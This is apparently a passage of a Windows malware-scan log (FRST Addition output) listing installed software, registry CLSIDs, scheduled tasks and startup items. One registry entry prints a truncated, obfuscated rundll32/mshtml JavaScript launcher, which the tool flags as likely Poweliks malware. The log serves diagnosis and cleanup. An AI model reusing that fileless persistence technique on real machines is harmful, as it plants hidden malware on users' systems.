Nero BurnRights Help (Version: 3.4.4.100 - Nero AG) Hidden
Nero ControlCenter (Version: 9.0.0.1 - Nero AG) Hidden
Nero CoverDesigner (Version: 4.4.23.100 - Nero AG) Hidden
Nero DiscSpeed (Version: 5.4.13.100 - Nero AG) Hidden
Nero DriveSpeed (Version: 4.4.12.100 - Nero AG) Hidden
Nero Express Help (Version: 9.4.39.100 - Nero AG) Hidden
Nero InfoTool (Version: 6.4.12.100 - Nero AG) Hidden
Nero Installer (Version: 4.4.9.0 - Nero AG) Hidden
Nero Online Upgrade (Version: 1.3.0.0 - Nero AG) Hidden
Nero ShowTime (Version: 5.4.27.100 - Nero AG) Hidden
Nero StartSmart (Version: 9.4.40.100 - Nero AG) Hidden
Nero StartSmart Help (Version: 9.4.40.100 - Nero AG) Hidden
Nero Vision (Version: 6.4.19.100 - Nero AG) Hidden
Nero Vision Help (Version: 6.4.15.100 - Nero AG) Hidden
NeroExpress (Version: 1.0.0.0 - Nero AG) Hidden
neroxml (Version: 1.0.0 - Nero AG) Hidden
PaperPort Image Printer (HKLM\...\{2BC2781A-F7F6-452E-95EB-018A522F1B2C}) (Version: 1.00.0000 - Nuance Communications, Inc.)
Photo Transfer App (HKLM\...\com.erclab.air.phototransferapp) (Version: 2.0.0 - UNKNOWN)
Photo Transfer App (Version: 2.0.0 - UNKNOWN) Hidden
PowerChute Personal Edition 3.0.2 (HKLM\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
QuickBooks (Version: 19.0.4014.705 - Intuit Inc.) Hidden
QuickBooks Pro 2009 (HKLM\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4014.705 - Intuit Inc.)
QuickTime (HKLM\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
RegZooka (HKLM\...\RegZooka) (Version: 2.96 - ZookaWare)
ScanSoft PaperPort 11 (HKLM\...\{848E36E7-0784-49C3-81F4-DD946ABAF46A}) (Version: 11.1.0000 - Nuance Communications, Inc.)
Skins (Version: 2010.0210.2339.42455 - ATI) Hidden
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
SupportSoft Assisted Service (HKLM\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2889914) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{F3F83933-75FC-4B60-84F2-3F8FA63D042E}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Viewpoint Media Player (HKLM\...\ViewpointMediaPlayer) (Version:  - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Media Encoder 9 Series (HKLM\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series (Version: 9.00.2980 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{05EC5C13-D255-4592-9CCB-98615172F0D6}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{0ADF9C35-0D5E-4B75-88DD-B64868907E17}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{0D7FDC12-4366-3687-B4C4-93C84983BEB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{123FAF7F-3FB1-4B8F-AD18-0047401D436A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{368CB9E8-3035-3AA5-B0D1-50FE1C930319}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{37A2FC00-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{37A2FC02-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4431F57E-8B58-387E-AC60-6DD3E7850CD5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4716D3CE-55DB-4D2A-818C-87D912895890}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4844F3F7-2161-4AC4-B219-B3B4311782AA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4A56F19E-9F50-4F43-93C8-050E44AA83A9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4E5E74B5-8EB5-4859-A335-837EED412620}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5428A9ED-6CD8-11D6-9C8A-0001023DCAA2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{547C8F00-5567-4AE3-8BB0-CC3CE2AB9070}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{57D590F1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{596801D8-2C9D-4627-9C67-195CB81B655A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5B7331FA-8910-4748-A8A4-60B445041F28}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5ED8AC89-B2DE-476D-8EEA-E170B2FCB058}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{60E1979E-326D-3D30-A96C-C6ADCDD2AF66}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{634C733B-EABF-3922-BA49-5CB3927D480C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{6d05bf60-3eaf-4a97-87c5-10cce505435b}\localserver32 -> C:\Users\Dale\AppData\Local\Temp\{9c0ba3c1-2b67-45eb-bf69-bed9658d28d2}\IDriver.NonElevated.exe No F (the data entry has 3 more characters).
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{738CD606-129D-45db-86D6-6C9739C750CA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{7694F1CD-A55B-4B7C-8820-A90892EB4E9E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{7DBF8260-30AD-4D1B-876A-8032B87B809F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{828E5386-74CF-4019-B356-C857CD028A7D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{82CC31B3-53B4-4161-A4E9-6B4F1290A6C8}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8572570D-12D9-4F2C-8BB8-EB8848178B94}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8E590317-1329-11D1-B70B-00805F29CD16}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8FEDE364-AB37-4551-80C9-6D468E222AB2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F2-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F3-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F4-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F5-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F6-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F7-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{A63E42D0-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{A63E42D2-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AF5E0A13-CEAB-47CE-991D-77E82CD1BF3F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{B10BFAC3-EFF1-40D9-ADA0-BEBE037C24CA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{B66F2BF1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{BB048B39-D3CB-37BF-A746-068C9F9FF26B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D14FD6B3-6A9F-4537-9460-07B836707127}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D4A12AAF-E15E-470B-A6B6-63032186F91F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9B9C060-0954-11D3-9E07-00104BD2BE34}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\ViewSource.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F81-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F84-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F87-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FA1-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\GraphSeriesCol.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FA6-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\GraphSeriesCol.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FB2-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\StorageClasses.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{DCB2B478-EFF6-48F6-B718-13E98876854E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{DFD0AF10-B86C-4AF3-B609-1348D513E565}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{E1A173E1-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{E1A173E3-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{EADA914E-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{EAEF733D-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{F2C593CC-74B2-4F71-8556-DD4D426D0409}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{FAC93D42-FFC2-11d1-9DEB-0008C7A08EBA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{FB17915F-06D1-4214-A902-CC5EE05186E9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
 
==================== Restore Points  =========================
 
06-09-2014 22:23:30 Scheduled Checkpoint
12-09-2014 23:34:50 Windows Update
13-09-2014 04:46:58 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2014-09-13 11:36 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0090CC82-95F4-4FED-8978-239F5D2A85E4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search &amp; Destroy 2\SDImmunize.exe
Task: {03C33618-F7D4-422F-B67A-4F061659D15F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-06-22] (Google Inc.)
Task: {33A9FD5B-A60B-479C-B902-6B8CB20A2CFC} - System32\Tasks\RegZooka Cleanup => C:\Program Files\RegZooka\RegZookaCleanup.exe [2012-02-01] ()
Task: {3EDB0EC8-CC5E-4C93-A774-499AA4E874E4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {BC68A2B6-36AC-4AA2-B081-0BC33BC7CCFA} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {C85BFC59-B731-484A-8BA2-81DAF74EAEF4} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files\Ask.com\UpdateTask.exe <==== ATTENTION
Task: {D4B565C6-32F8-4DA6-B961-2B70876E81A0} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: {F1F88050-21A6-42BD-BB9C-AC88AB767817} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-06-22] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-10-19 16:29 - 2008-11-13 10:47 - 00094208 _____ () C:\Windows\System32\Dell2335Port_x86.dll
2012-10-19 16:23 - 2007-12-10 02:57 - 00022723 _____ () C:\Windows\System32\sdf1ml3.dll
2012-02-20 21:29 - 2012-02-20 21:29 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 21:28 - 2012-02-20 21:28 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-10-18 10:18 - 2011-02-07 11:56 - 00138192 _____ () C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
2013-12-09 08:38 - 2014-08-12 03:03 - 01654296 _____ () C:\Program Files\AVG Secure Search\TBAPI.dll
2010-06-07 05:35 - 2010-06-07 05:35 - 00282624 _____ () C:\Windows\system32\SaMinDrv.dll
2014-08-12 03:03 - 2014-08-12 03:03 - 00159768 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2014-08-12 03:03 - 2014-08-12 03:03 - 00519704 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-08-24 09:30 - 2014-08-24 09:30 - 03642480 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2014-01-08 13:48 - 2014-01-08 13:48 - 16242056 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^APC UPS Status.lnk => C:\Windows\pss\APC UPS Status.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^AOL Desktop.lnk => C:\Windows\pss\AOL Desktop.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Dale\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: AVG_UI => "C:\Program Files\AVG\AVG2014\avgui.exe" /TRAYONLY
MSCONFIG\startupreg: CanonMyPrinter => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx => C:\Program Files\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: Dell PanelMgr => C:\Windows\Dell\PanelMgr\SSMMgr.exe /autorun
MSCONFIG\startupreg: Display => C:\Program Files\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
MSCONFIG\startupreg: GoogleDriveSync => "C:\Program Files\Google\Drive\googledrivesync.exe" /autostart
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: HostManager => C:\Program Files\Common Files\AOL\1332695770\ee\AOLSoftware.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IndexSearch => "C:\Program Files\DELL\Dell 2335dn MFP\PaperPort\IndexSearch.exe"
MSCONFIG\startupreg: Intuit SyncManager => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe  startup
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: PaperPort PTD => "C:\Program Files\DELL\Dell 2335dn MFP\PaperPort\pptd40nt.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
